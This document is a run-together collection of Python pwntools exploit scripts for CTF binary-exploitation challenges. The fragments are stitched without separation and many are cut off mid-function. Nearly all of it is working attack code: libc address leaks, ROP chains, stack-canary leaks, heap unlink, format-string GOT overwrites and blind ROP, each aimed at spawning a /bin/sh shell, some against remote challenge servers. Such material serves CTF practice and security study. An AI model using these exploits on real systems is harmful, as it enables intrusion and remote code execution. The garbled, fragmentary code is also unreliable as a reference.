def heap_exploit():
global s
elf = ELF('./babyfirewall')
rel_plt = elf.get_section_by_name('.rel.plt').header.sh_addr
plt0 = elf.get_section_by_name('.plt').header.sh_addr
read_plt = elf.plt['read']
atoi_got = elf.got['atoi']
LIST_addr = 0x804b080
welcome('natsu')
read = show((((read_plt - plt0)/16-1)*8 + rel_plt - LIST_addr)/4) #read function's addr
read = u32(read[:4])
libc = LibcSearcher('read', read)
base = read - libc.dump('read')
system = base + libc.dump('system')
log.success("base's address: " + hex(base))
log.success("system's address: " + hex(system))
add(0, 16, 'abcd')
delete(0)
delete(0)
add(0, 16, p32(atoi_got))
add(0, 16, 'abcd')
add(0, 16, p32(system))
s.recvuntil('Your choice: ')
s.send('/bin/sh\x00')
s.interactive()
def exp():
# leak canary
payload = b"A"*0x88 + b"B"
store(payload)
menu(2)
io.recvuntil("B")
canary = u64(io.recv(7).rjust(8, b"\x00"))
log.debug("canary: 0x%x" % canary)
# leak libc
payload = b"A"*0x88 + p64(canary) + p64(0xdeadbeef) + p64(0x400a93) + p64(elf.got["puts"]) + \
p64(elf.plt["puts"]) + p64(0x400908)
store(payload)
menu(3)
puts_addr = u64(io.recv(6).ljust(8, b"\x00"))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
# onegadget 0x45216
onegadget_addr = libc_base + 0x45216
payload = b"A"*0x88 + p64(canary) + p64(0xdeadbeef) + p64(onegadget_addr)
store(payload)
menu(3)
io.interactive()
def exp(io):
elf = ELF(localfile)
puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
main = elf.symbols["main"]
io.recvuntil("RCTF\n")
payload1 = b"A" * 0x18 + p64(0x40089c) + p64(0x4008a3) + p64(puts_got) + p64(puts_plt) + p64(main)
io.send(payload1)
io.recvuntil("\x9c\x08\x40")
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.debug("puts addr: 0x%8x" % puts_addr)
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
log.debug("libc base: 0x%8x" % libc_base)
system_addr = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")
payload2 = b"A" * 0x18 + p64(0x40089c) + p64(0x4008a3) + p64(str_bin_sh) + p64(system_addr)
# io.recvuntil("RCTF\n")
# gdb.attach(io, "b *0x4007cc")
io.send(payload2)
io.interactive()
def exp():
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gadget1 = 0x08048dab # pop ebp ; ret
gadget2 = 0x08048da8 # pop ebx ; pop esi ; pop edi ; pop ebp ; ret
gadget3 = 0x08048495 # pop ebx ; ret
gadget4 = 0x08048daa # pop edi ; pop ebp ; ret
gadget5 = 0x08048da9 # pop esi ; pop edi ; pop ebp ; ret
leave_ret = 0x080485f8 #leave; ret
stdin_bss = 0x0804B060
buf_bss = 0x0804B500
readn = 0x80486d9
rop_1 = 'a' * 0xd + p32(puts_plt) + p32(gadget3) + p32(
puts_got) #puts(&puts)
rop_1 += p32(readn) + p32(gadget4) + p32(buf_bss) + p32(
0x100) #readn(buf_bss. 0x100), ebp=buf_bss
rop_1 += p32(gadget1) + p32(buf_bss) + p32(leave_ret) + p32(
buf_bss) #privotstack to buf_bss
add(rop_1)
add('b' * 255)
add('c' * 255)
add('d' * 255)
add('e' * 255)
#gdb.attach(p, 'b* 0x08048CFA')
post(4, -15) #setbuf(fd, content4)
post(1, 0) #nofilter(content1, size, fd)
post(0, 0)
quit()
p.recvuntil('service :)\n')
puts_addr = u32(p.recv(4))
"""
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search('/bin/sh\x00'))
"""
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
print "system ==> " + hex(system_addr)
payload = p32(system_addr) * 2 + p32(0xdeadbeef) + p32(binsh)
p.sendline(payload)
p.interactive()
p.close()
def search_libc(size, leak_addr):
lib = LibcSearcher('puts', leak_addr)
libc_base = leak_addr - lib.dump('puts')
system_addr = libc_base + lib.dump('system')
binsh_addr = libc_base + lib.dump('str_bin_sh')
print 'Libc Base: ', hex(libc_base)
print 'system() : ', hex(system_addr)
print '/bin/sh : ', hex(binsh_addr)
return system_addr, binsh_addr
def exploit():
bss = 0x0804A040 + 0x500
fake_ebp = bss
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_ebp_28 = 0x080485Da
leave_ret = 0x080485FD
system = 0x08048559
payload = 'a' * 0x28
payload += p32(fake_ebp)
p.sendafter('name?\n', payload)
p.recvuntil(p32(0x0804862A))
dbg()
#if no libc one_gadget
#payload += p32(libc.address + 0x3cbf7)
#else
#stack povit
#will read(0, fake_ebp-0x28, large_number)
payload += p32(read_ebp_28)
p.send(payload)
#gdb.attach(p, 'b* 0x080485FD')
#leak libc
dbg()
payload = 'a' * 0x28 + p32(fake_ebp) + p32(puts_plt) + p32(
read_ebp_28) + p32(puts_got)
p.send(payload)
p.recvline()
p.recvline()
p.recvline()
puts_addr = u32(p.recv(4))
print "puts_addr ==> " + hex(puts_addr)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
binsh = libc.dump('str_bin_sh') + libc_base
system = libc.dump('system') + libc_base
#get shell
dbg()
#payload = 'a'*0x28 + p32(fake_ebp) + p32(system) + p32(read_ebp_28) + p32(binsh)
payload = 'a' * 0x8
p.send(payload)
p.interactive()
p.close()
def servers():
elf = ELF('./level1',checksec=False)
payload = 'A'*(0x88+4)
payload += flat([
elf.plt['write'], elf.sym['main'], 1, elf.got['write'], 8
])
p.send(payload)
write_addr = u32(p.recv(4))
log.success('write_addr = %#x',write_addr)
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.info('system_addr = %#x, binsh = %#x'%(system_addr,binsh))
payload = 'A'*(0x88+4)
payload += flat([system_addr, elf.sym['main'], binsh])
p.send(payload)
sleep(1)
p.interactive()
def exp():
# payload = b"A"*0x70 + p32(elf.plt["setbuf"]) + p32(0x80484be) + p32(0x804A040) + p32(0)
# io.sendlineafter("Welcome to XDCTF2015~!\n", payload)
payload = b"A" * 0x70 + p32(
elf.plt["write"]) + p32(0x80484be) + p32(1) + p32(
elf.got["write"]) + p32(4)
io.sendlineafter("Welcome to XDCTF2015~!\n", payload)
write_addr = u32(io.recv(4))
log.info("write addr: 0x%x" % write_addr)
libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
system_addr = libc.dump("system") + libc_base
binsh_addr = libc.dump("str_bin_sh") + libc_base
payload = b"A" * 0x70 + p32(system_addr) + p32(0xdeadbeef) + p32(
binsh_addr)
io.sendlineafter("Welcome to XDCTF2015~!\n", payload)
io.interactive()
def roplist(p):
elf = ELF('./ciscn_2019_n_5', checksec=False)
puts_plt = elf.sym['puts']
read_got = elf.got['read']
main = elf.sym['main']
pop_rdi = 0x0000000000400713 # pop rdi ; ret
ret = 0x00000000004004c9 # ret
binsh_bss = 0x601080
p.recvuntil("tell me your name\n")
p.send('123')
p.recvuntil("What do you want to say to me?\n")
payload = 'A' * (0x20 + 8)
payload += flat([ret, pop_rdi, read_got, puts_plt, main])
p.sendline(payload)
read_addr = u64(p.recv(7).ljust(8, '\x00'))
log.success('read_addr = %#x', read_addr)
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.info('system_addr = %#x, binsh = %#x' % (system_addr, binsh))
p.recvuntil("tell me your name\n")
p.send('/bin/sh\x00')
p.recvuntil("What do you want to say to me?\n")
payload = 'A' * (0x20 + 8)
# payload += flat([ret, pop_rdi, binsh, system_addr, main])
payload += flat([ret, pop_rdi, binsh_bss, system_addr, main])
p.send(payload)
sleep(1)
p.interactive()
def exploit():
# dbg()
write_got = elf.got['write']
write_plt = elf.plt['write']
print "write_got ==> " + hex(write_got)
print "write_plt ==> " + hex(write_plt)
bss = 0x0804A300
main = 0x0804849B
leave_ret = 0x08048511
shell = 'a' * 0x18 + p32(bss - 0x4) + p32(leave_ret)
payload = p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4)
p.sendafter('name?', payload)
p.sendafter('say?', shell)
write_addr = u32(p.recv(4))
'''
libc.address = write_addr - libc.symbols['write']
print "libc ==> " + hex(libc.address)
system = libc.symbols['system']
binsh = next(libc.search("/bin/sh"))
'''
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
print "libc_base ==> " + hex(libc_base)
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
shell = 'b' * 0x14 + p32(bss + 0x20) + p32(bss - 0x4)
payload = 'c' * 0x8 + p32(system) + p32(main) + p32(binsh)
p.sendafter('name?', payload)
p.sendafter('say?', shell)
p.interactive()
p.close()
def get_libc(function, address):
global one_gadget_addr, system_addr, bin_sh_addr, libc_start_main_ret_addr, libc_base
# Use Write Or Puts Or Printf Func Print Symbols addr
# Call get_libc Func
try:
libcsearch = LibcSearcher(function, address)
libc_base = address - libcsearch.dump(function)
bin_sh_addr = libc_base + libcsearch.dump("str_bin_sh")
system_addr = libc_base + libcsearch.dump("system")
one_gadget_addr = libc_base + 0x10a38c
libc_start_main_ret_addr = libc_base + libcsearch.dump(
"__libc_start_main_ret")
info("Found Libc base : " + hex(libc_base))
info("Found Str BinSh : " + hex(bin_sh_addr))
info("Found System : " + hex(system_addr))
info("Found One_gadget : " + hex(one_gadget_addr))
info("Found Libc_start_main_ret : " + hex(libc_start_main_ret_addr))
except:
null = ""
libc = ELF('./leakless')
#def leak(addr):
# pay = 'a'*0x48 + 'bbbb' + p32(libc.symbols['puts'])+p32(libc.symbols['main']) +p32(addr)
# sh.send(pay)
# data= sh.recv(4)
# return data
#
#d = DynELF(leak,elf = ELF('./leakless'))
#sys_add = d.lookup('system','libc')
pay = 'a' * 0x48 + 'bbbb' + p32(libc.symbols['puts']) + p32(
libc.symbols['feedme']) + p32(libc.got['puts'])
sh.sendline(pay)
puts_got_addr = u32(sh.recv(4))
print "puts_got_addr: " + hex(puts_got_addr)
obj = LibcSearcher("puts", puts_got_addr)
system_addr = puts_got_addr - obj.dump('puts') + obj.dump("system")
binsh_addr = puts_got_addr - obj.dump('puts') + obj.dump("str_bin_sh")
success("system_addr: " + hex(system_addr))
success("binsh_addr: " + hex(binsh_addr))
pay = 'a' * 0x48 + 'bbbb' + p32(system_addr) + p32(
libc.symbols['main']) + p32(binsh_addr)
#gdb.attach(sh)
sh.sendline(pay)
sh.interactive()
#stop_gadget = find_stop_gadget(size)
stop_gadget = 0x4005c0
#brop_gadget = find_brop_gadget(size, stop_gadget)
brop_gadget = 0x4007ba
log.success('BROP Gadget : ' + hex(brop_gadget))
rdi_gadget = brop_gadget + 9
log.success('RDI Gadget : ' + hex(rdi_gadget))
#puts_plt = find_puts_addr(size,stop_gadget,rdi_gadget)
puts_plt = 0x400555
log.success('Puts plt : ' + hex(puts_plt))
#memory_dump(size,stop_gadget,rdi_gadget,puts_plt)
puts_got = 0x601018
r = remote(ip, port, level='error')
addr_puts_libc = leak_libc(r, size, stop_gadget, rdi_gadget, puts_plt,
puts_got)
log.info('Address of puts in libc : ' + hex(addr_puts_libc))
lib = LibcSearcher('puts', addr_puts_libc)
libcBase = addr_puts_libc - lib.dump('puts')
system_addr = libcBase + lib.dump('system')
binsh_addr = libcBase + lib.dump('str_bin_sh')
log.info('libc base : ' + hex(libcBase))
log.info('system : ' + hex(system_addr))
log.info('binsh : ' + hex(binsh_addr))
from pwn import *
from LibcSearcher import *
io = remote('node3.buuoj.cn', 28557)
elf = ELF('bjdctf_2020_babyrop')
context.log_level = 'debug'
main_addr = 0x4006AD
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x400733
payload = 'a' * 40 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(
main_addr)
io.recvuntil('Pull up your sword and tell me u story!\n')
io.sendline(payload)
message = u64(io.recv(6).ljust(8, '\x00'))
print(message)
libc = LibcSearcher('puts', message)
base = message - libc.dump('puts')
system = base + libc.dump('system')
str_sh = base + libc.dump('str_bin_sh')
io.recvuntil('Pull up your sword and tell me u story!\n')
payload = 'a' * 40 + p64(pop_rdi) + p64(str_sh) + p64(system)
io.sendline(payload)
io.interactive()
new(0x80, '/bin/sh\x00')
edit(3, 'a')
payload = p64(0) + p64(0x20) + p64(0x6020e0 - 0x18) + p64(0x6020e0 -
0x10) + p64(0x20)
payload = payload.ljust(0x80, 'a')
payload += p64(0x80) + p64(0x90)
edit(-0x8000000000000000, payload)
#gdb.attach(io,'b *0x400BB9')
#raw_input()
delete(4)
free_got = elf.got['free']
printf_plt = elf.plt['printf']
puts_plt = elf.plt['puts']
#gdb.attach(io,'b *0x400CB8')
#raw_input()
write(free_got, p64(printf_plt)[:-1])
write(0x6020e8, '%11$p\x00')
#gdb.attach(io,'b *0x400BB9')
#raw_input()
libc_start_main = int(show(), 16) - 240
obj = LibcSearcher('__libc_start_main', libc_start_main)
libc_base = libc_start_main - obj.dump('__libc_start_main')
system = obj.dump('system') + libc_base
log.success('system: ' + hex(system))
write(free_got, p64(system)[:-1])
#gdb.attach(io,'b *0x400BB9')
#raw_input()
delete(6)
io.interactive()
puts_got = elf.got["puts"]
print("puts_plt:" + str(puts_plt))
print("puts_got:" + str(puts_got))
main_addr = 0x4006b8
popret = 0x400763
# payload1 = "a" * 72 + p64(puts_plt) + p64(main_addr) + p64(puts_got)
payload1 = "a" * 72 + p64(popret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
payload1 += 'a' * (200 - len(payload1))
io.sendline(payload1)
io.recvuntil("bye~\n")
# puts_addr = int(io.recv(6), 16)
puts_addr = u64(io.recv(6).ljust(8, '\x00'))
print("puts_addr:" + str(hex(puts_addr)))
libc = LibcSearcher("puts", puts_addr)
libcbase = puts_addr - libc.dump("puts")
system_addr = libcbase + libc.dump("system")
binsh_addr = libcbase + libc.dump("str_bin_sh")
payload2 = 'a' * 71 + p64(popret) + p64(binsh_addr) + p64(system_addr) # extra \x0a before
payload2 += 'a' * (200 - len(payload2))
# gdb.attach(io)
print("popret:" + hex(popret))
print("system_addr:" + hex(system_addr))
io.sendline(payload2)
io.interactive()
write_address = exe.got['write']
main_address = exe.symbols['main']
reg_values = [0, 0, write_address, 1, write_address, 8]
padding_over1 = ['A'] * 56
padding_over = ['A'] * 136
f**k = csu(reg_values, padding_over, padding_over1, main_address)
io = start()
io.recvuntil('Hello, World\n')
io.sendline(f**k)
sleep(1)
write_address = u64(io.recv(8))
libc = LibcSearcher('write', write_address)
libc_base = write_address - libc.dump('write')
# get real system address
system_addr = libc_base + libc.dump('system')
read_addr = libc_base + libc.dump('read')
bss_base = exe.bss()
# make /bin/bash string read(0, bss_base, 16)
reg_values = [0, 0, read_addr, 0, bss_base, 16]
padding_over = ['A'] * 136
padding_over1 = ['A'] * 56
f**k = csu(reg_values, padding_over, padding_over1, main_address)
io.sendline(f**k)
io.send(p64(system_addr) + '/bin/sh\x00')
payload += p64(last)
sh.send(payload)
sleep(1)
gdb.attach(sh)
sh.recvuntil('Hello, World\n')
## RDI, RSI, RDX, RCX, R8, R9, more on the stack
## write(1,write_got,8)
csu(0, 1, write_got, 1, write_got, 8, main_addr)
# sh.recvuntil('Hello, World\n')
write_addr = u64(sh.recv(8))
print "write_addr, ", hex(write_addr), write_addr
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
execve_addr = libc_base + libc.dump('execve')
log.success('execve_addr ' + hex(execve_addr))
####--- orignal test.
## read(0,bss_base,16)
## read execve_addr and /bin/sh\x00
sh.recvuntil('Hello, World\n')
csu(0, 1, read_got, 0, bss_base, 16, main_addr)
sh.send(p64(execve_addr) + '/bin/sh\x00')
sh.recvuntil('Hello, World\n')
## execve(bss_base+8)
csu(0, 1, bss_base, bss_base + 8, 0, 0, main_addr)
# p = process('./babyrop')
p = remote('node3.buuoj.cn', 27480)
elf = ELF('./babyrop', checksec=False)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.sym['main']
pop_rdi = 0x0000000000400733 # pop rdi ; ret
payload = 'A' * (0x20 + 8)
payload += flat([pop_rdi, puts_got, puts_plt, main])
p.recvuntil("Pull up your sword and tell me u story!\n")
p.send(payload)
puts_addr = u64(p.recvuntil('\n', drop=True).ljust(8, '\x00'))
log.success('puts_addr = %#x', puts_addr)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.info('system_addr = %#x, binsh = %#x' % (system_addr, binsh))
payload = 'A' * (0x20 + 8)
payload += flat([pop_rdi, binsh, system_addr, main])
p.recvuntil('story!\n')
p.send(payload)
sleep(1)
p.interactive()
return
def edit(idx,content):
return
def show(idx):
return
relloc_offset = [0,2,4,6,0xb,0xc,0x10]
#payload='\x00'*0x33+p64(0x00000000fbad1800)+p64(0)*3+'\x00' #stdout-0x33
payload = p32(0x08048e48) * (0x64 / 4)
set_name(payload)
menu(1)
#debug()
payload = "-10\x00" + p32(0) + p32(elf.plt["puts"]) +p32(0x804A605)+ p32(elf.got["puts"])
a.sendlineafter("> ",payload)
puts_addr = u32(a.recv(4))
libc =LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
f**k(libc_base)
payload = "/bin/sh\x00" + p32(0x08048e48) * (0x5c / 4)
set_name(payload)
menu(1)
#debug()
pop_3_ret = 0x080494da
payload = "-10\x00" + p32(0) + p32(libc_base + libc.dump("system")) +p32(0)+ p32(0x80580D0)
#payload = "-10\x00" + p32(0) + p32(elf.plt["open"]) + p32(pop_3_ret) + p32(0x80580D0) + p32(0) + p32(0)
#payload += p32(elf.plt["read"]) + p32(pop_3_ret) + p32(3) + p32(elf.bss() + 0x800) + p32(0x30)
#payload += p32(elf.plt["write"]) + p32(pop_3_ret) + p32(1) + p32(elf.bss()+ 0x800) + p32(0x30)
a.sendlineafter("> ",payload)
a.interactive()
###leak canary###
payload = 'ab%7$p'
sla("I'll give u some gift to help u!", payload)
ru("ab")
canary = int(rv(18), 16)
success(hex(canary))
###leak libc###
offset = 0x20
payload = 'A' * (offset - 0x8) + p64(canary) + 'deadbeef'
payload += p64(pop_rdi_ret) + p64(puts_got)
payload += p64(puts_plt) + p64(vuln)
sla("Pull up your sword and tell me u story!", payload)
puts = u64(ru("\x7f")[-6:].ljust(8, '\x00'))
libc = LibcSearcher("puts", puts)
libc_base = puts - libc.dump('puts')
system = libc_base + libc.dump("system")
sh = libc_base + libc.dump("str_bin_sh")
###ROP###
sla("I'll give u some gift to help u!", "hack it")
payload = 'A' * (offset - 0x8) + p64(canary) + 'deadbeef'
payload += p64(pop_rdi_ret) + p64(sh)
payload += p64(system) + p64(vuln)
sla("Pull up your sword and tell me u story!", payload)
###get shell###
ia()
from pwn import *
from LibcSearcher import *
ru = lambda x:p.recvuntil(x)
sl = lambda x:p.sendline(x)
context.log_level='debug'
#p = process('./1')
p = remote('220.249.52.133','59451')
elf = ELF('./1')
write_got = elf.got['write']
puts_plt = elf.plt['puts']
pop_24 = 0x40089C
pop_rdi = 0x4008A3
main_addr = 0x4007CD
ru('Welcome to RCTF\n')
payload = 'a'*0x18 + p64(pop_24) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(main_addr)
sl(payload)
ru('\x40')
write_addr = u64(p.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
ru('\n')
payload = 'a'*0x18 + p64(pop_24) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
sl(payload)
p.interactive()
p.recvuntil('Enter the content: \n')
p.sendline(content)
###leak libc###
payload = '%11$p%15$p'
p.recvuntil('Enter your name: ')
p.sendline(payload)
p.recvuntil('Hello, ')
base = int(p.recv(14), 16) - 0x1186
libc_start_main = int(p.recv(14), 16) - 240
success(hex(base))
success(hex(libc_start_main))
libc = LibcSearcher('__libc_start_main', libc_start_main)
libc_base = libc_start_main - libc.dump('__libc_start_main')
system = libc_base + libc.dump('system')
###unlink###
heap_array = base + 0x202060
free_hook = libc_base + libc.dump('__free_hook')
chunk = heap_array + 0x10
fake_FD = chunk - 0x18
fake_BK = chunk - 0x10
add(0, 0x98, 'aaaa')
add(1, 0x98, 'bbbb')
add(2, 0x98, 'cccc')
add(3, 0x90, 'dddd')
add(4, 0x90, '/bin/sh\x00')
def printcontact():
sh.recvuntil('>>> ')
sh.sendline('4')
sh.recvuntil('Contacts:')
sh.recvuntil('Description: ')
# get system addr & binsh_addr
payload = '%31$paaaa'
createcontact('1111', '1111', '111', payload)
printcontact()
libc_start_main_ret = int(sh.recvuntil('aaaa', drop=True), 16)
log.success('get libc_start_main_ret addr: ' + hex(libc_start_main_ret))
libc = LibcSearcher('__libc_start_main_ret', libc_start_main_ret)
libc_base = libc_start_main_ret - libc.dump('__libc_start_main_ret')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
log.success('get system addr: ' + hex(system_addr))
log.success('get binsh addr: ' + hex(binsh_addr))
#gdb.attach(sh)
# get heap addr and ebp addr
payload = flat([
system_addr,
'bbbb',
binsh_addr,
'%6$p%11$pcccc',
])
createcontact('2222', '2222', '222', payload)
#这里用到了printf("You said: %s\n", &nptr)语句的%s的地址,所以后面调用printf函数时的参数是‘you said 。。。。’,所以后面接受时要接收2次said之后的结果。
frame_adr = 0x80486f8
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main = 0x80485b8
io.recvuntil('to read?')
payload = '-1'
io.sendline(payload)
payload = cyclic(0x2c + 4) + p32(printf_plt) + p32(main) + p32(
frame_adr) + p32(printf_got)
io.recvuntil('of data!\n')
io.sendline(payload)
#函数结束前的输出字符串
io.recvuntil('said: ')
#rop执行后输出的字符串,其中有函数地址
io.recvuntil('said: ')
printf_adr = u32(io.recv(4))
libc = LibcSearcher('printf', printf_adr)
print(printf_adr)
base = printf_adr - libc.dump('printf')
system = base + libc.dump('system')
binsh = base + libc.dump('str_bin_sh')
payload = '-1'
io.recvuntil('to read?')
io.sendline(payload)
payload = cyclic(0x2c + 4) + p32(system) + p32(main) + p32(binsh)
io.recvuntil('data!\n')
io.sendline(payload)
io.interactive()
p = process('./chall')
else:
p = remote('challs.xmas.htsp.ro', 12006)
elf = ELF('./chall', checksec=False)
plt_puts = elf.plt['puts']
got_puts = elf.got['puts']
addr_rdi = 0x401273
addr_main = 0x401167
pd = 'a' * 0x12
pd += p64(addr_rdi)
pd += p64(got_puts)
pd += p64(plt_puts)
pd += p64(addr_main)
p.sendlineafter('Helloooooo, do you like to build snowmen?\n', pd)
p.recvuntil('Mhmmm... Boring...\n')
addr_puts = u64(p.recv(6).ljust(8, '\x00'))
libc = LibcSearcher('puts', addr_puts)
# 1: http://ftp.osuosl.org/pub/ubuntu/pool/main/g/glibc/libc6_2.27-3ubuntu1_amd64.deb (id libc6_2.27-3ubuntu1_amd64)
libc_one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]
libcbase = addr_puts - libc.dump('puts')
addr_one_daget = libcbase + libc_one_gadget[0]
pd = 'a' * 0x12
pd += p64(addr_one_daget)
p.sendlineafter('Helloooooo, do you like to build snowmen?\n', pd)
p.recvuntil('Mhmmm... Boring...\n')
success('addr_puts = ' + hex(addr_puts))
p.interactive()
sleep(1)
r = remote(host, port)
r.recvuntil(header)
# now that we have the binary, the rest is just normal rop
p = log.progress('Leaking GOT entry of puts', level=logging.CRITICAL)
context.log_level = 'critical' # suspend all logging
puts_got = 0x601018
puts_libc = u64(same_session_leak(r, offset, puts_got, pop_rdi_ret, puts)[:8])
# alternatively, use dynelf to resolve them, but somehow doesnt work...
# dynelf_leak = lambda addr: same_session_leak(r, offset, addr, pop_rdi_ret, puts)[:8]
# d = DynELF(dynelf_leak, pointer=puts)
# puts_libc = d.lookup('puts', 'libc')
context.log_level = 'info' # resume all logging
p.success('Leaked puts@libc: 0x%x' % puts_libc)
libc = LibcSearcher('puts', puts_libc)
libc_base = puts_libc - libc.dump('puts')
binsh = libc_base + libc.dump('str_bin_sh')
system = libc_base + libc.dump('system')
# call system
log.info('Calling system(\'/bin/sh\')')
payload = call_function(offset, system, binsh, pop_rdi_ret, stop_gadget)
r.sendline(payload)
r.interactive()
elf = ELF('/home/nop/Desktop/babystack')
puts_plt = elf.symbols['puts']
read_got = elf.got['read']
log.info('puts_plt = %#x, read_got = %#x'%(puts_plt,read_got))
payload1 = 'A'*0x88 + p64(canary) + 'B'*8
payload1 += p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(0x400720)
p.send(payload1)
sleep(3)
p.recvuntil("\n>> ") # read the trash data
p.send('3') # choice 3 option to make the stack crash
sleep(1)
read_addr = u64(p.recv()[:6].ljust(8,'\x00'))
log.info('read_addr = %#x',read_addr)
libc = LibcSearcher('read',read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
log.info("system_addr = %#x, binsh_addr = %#x"%(system_addr,binsh_addr))
sleep(1)
p.send('1') # choice 1 option to couse stack overflow
payload2 = 'A'*0x88 + p64(canary) + 'B'*8
payload2 += p64(pop_rdi) + p64(binsh_addr) + p64(system_addr) + p64(0x400720)
p.send(payload2)
sleep(0.1)
p.send('3') # choice 3 option to make the stack crash
sleep(1)
text_segment += '\x00'
finally:
f = open('blind_pwn', 'wb')
f.write(text_segment)
###leak program###
start = 0x8048000
stop = 0x8048b00
#dump2file(start,stop)
###leak libc###
read_got = 0x804A010
read = u32(dump4text(read_got)[:4])
libc = LibcSearcher('read', read)
libc_base = read - libc.dump('read')
system = libc_base + libc.dump('system')
success(hex(libc_base))
###hijack GOT###
printf_got = 0x804A014
payload = fmtstr_payload(8, {printf_got: system}, numbwritten=10)
sl(payload)
sl(';/bin/sh\x00')
###get shell###
ia()
from LibcSearcher import *
p = process('./GUESS')
elf = ELF('./GUESS')
offset = 0x128
puts_got = elf.got['puts']
###leak libc###
payload = 'A' * offset + p64(puts_got)
p.recvuntil('Please type your guessing flag\n')
p.sendline(payload)
p.recvuntil('*** stack smashing detected ***:')
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
log.success('libc base:' + hex(libc_base))
###leak stack###
environ = libc_base + libc.dump('_environ')
log.success('_environ:' + hex(environ))
payload = 'A' * offset + p64(environ)
p.recvuntil('Please type your guessing flag\n')
p.sendline(payload)
stack = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
log.success('stack:' + hex(stack))
###leak flag###